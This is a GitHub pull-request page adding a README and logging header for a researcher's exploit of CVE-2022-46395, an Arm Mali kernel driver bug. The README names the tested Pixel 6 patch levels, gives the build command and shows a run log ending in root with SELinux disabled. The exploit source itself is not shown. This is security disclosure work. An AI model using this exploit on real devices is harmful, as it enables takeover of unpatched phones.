Skip to content

Blog material #760

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
m-y-mo merged 2 commits into from
May 25, 2023
Merged

Blog material #760

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
2c1e4be
Initial commit
m-y-mo Feb 24, 2023
319b5ad
Add link
m-y-mo May 24, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Next Next commit
Initial commit
  • Loading branch information
@m-y-mo
m-y-mo committed Feb 24, 2023
commit 2c1e4be2af5336fd6d90658feff3c2fd855e8353
54 changes: 54 additions & 0 deletions SecurityExploits/Android/Mali/CVE_2022_46395/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,54 @@
## Exploit for CVE-2022-46395

The write up can be found [here](). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.

The exploit is tested on the Google Pixel 6 with the Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:

```
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
```

The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race conditions hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rare crashes. If successful, it should disable SELinux and gain root.

```
oriole:/ $ /data/local/tmp/mali_user_buf
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
benchmark_time 357
failed after 100
failed after 200
failed after 300
benchmark_time 343
failed after 400
failed after 500
failed after 600
benchmark_time 337
failed after 700
failed after 800
failed after 900
benchmark_time 334
failed after 1000
failed after 1100
failed after 1200
benchmark_time 363
failed after 1300
finished reset: 190027720 fault: 135735849 772 err 0 read 3
found pgd at page 4
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
result 50
oriole:/ #
```
11 changes: 11 additions & 0 deletions SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
#ifndef LOG_UTILS_H
#define LOG_UTILS_H

#ifdef SHELL
#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
#else
#include <android/log.h>
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
#endif

#endif
Loading